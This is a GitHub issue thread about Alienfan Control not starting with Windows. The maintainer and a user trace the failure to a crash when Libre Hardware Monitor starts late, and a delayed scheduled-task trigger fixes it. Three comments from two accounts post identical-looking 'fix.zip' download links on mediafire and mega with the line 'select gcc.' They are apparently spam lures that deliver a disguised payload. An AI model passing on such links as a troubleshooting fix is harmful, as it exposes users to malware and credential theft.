T-Troll/alienfx-tools #442: Alienfun Control can't start with windows

AprDeci, 2024-08-24:
**Describe the bug**
I use a 8.5.x version alienfx tools before and it could start with windows,but it can't do it after i update to new lastest version,i try to reinstall it or repair it (includes cancel the setting and enable it again),but it still could start correctly.

**Expected behavior**
aligenfun control can start with windows

**System (please complete the following information):**
 - Model: G15-5511
 - OS: Windows10

T-Troll, 2024-08-25:
I check, works like a charm for me.
It can happen if you are installed update to other folder.
To set it back, just turn off "Start with windows" in Settings, then turn it back on.

PS: Check Task Scheduler - it should have `Alienfan-gui` task for it.

Zoraaa-z, 2024-08-25:
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

Zoraaa-z, 2024-08-25:
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

esttemanb, 2024-08-25:
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

roboboredom, 2024-11-16:
Doesn't work for me either. Alienware M16, Windows 11, No other apps installed that interfere with the software as far as I am aware. Complete details:

SETTINGS:
[image]

TASK SCHEDULER SETTINGS (**Note the "Last Run Result" status code... I do not know what it means, but the task IS attempting to be run on boot!**):
[image]
[image]
[image]
[image]
[image]
[image]

INSTALL DIR:
[image]
[image]
[image]

Note: I have tried unchecking both options in the app settings, restarting, and rechecking them and several variations of that. There is only one installation of the app, and nothing residual from a previous install as far as I could find.

T-Troll, 2024-11-16:
I see it crashes at start, but works later on...
A bit strange for me.
Did alienfx-gui acting the same way?

roboboredom, 2024-11-17:
WAIT! I solved it, good news. It was hard to figure out, but it would crash if Libre Hardware Monitor was not running before it started, so when windows started both if LHM started afterwards, it failed. I fixed the problem by setting a 30 second delay on the "on user logon" trigger for the scheduled task.

T-Troll, 2024-11-17:
Oh... It should not be like this, just some sensors should disappear!
Thanks for the hint, i'll check and fix this.

roboboredom, 2024-11-17:
Yeah, I remember that being the case in the past, which is probably why I didn't suspect it at first. If you need any information about my setup or install, I'd be happy to provide it when I next get the chance. P.S. "wille" my account, is an administrator, and the task scheduler task your program generates is run with highest privileges. It's definitely not a privilege issue.

T-Troll, 2024-11-17:
Seems like i found the source of the crash, this can happen in some cases, then sensor list changed.
And yes, privilege is not an issue - app just don't start if started from user (data can only be accessed from Admin).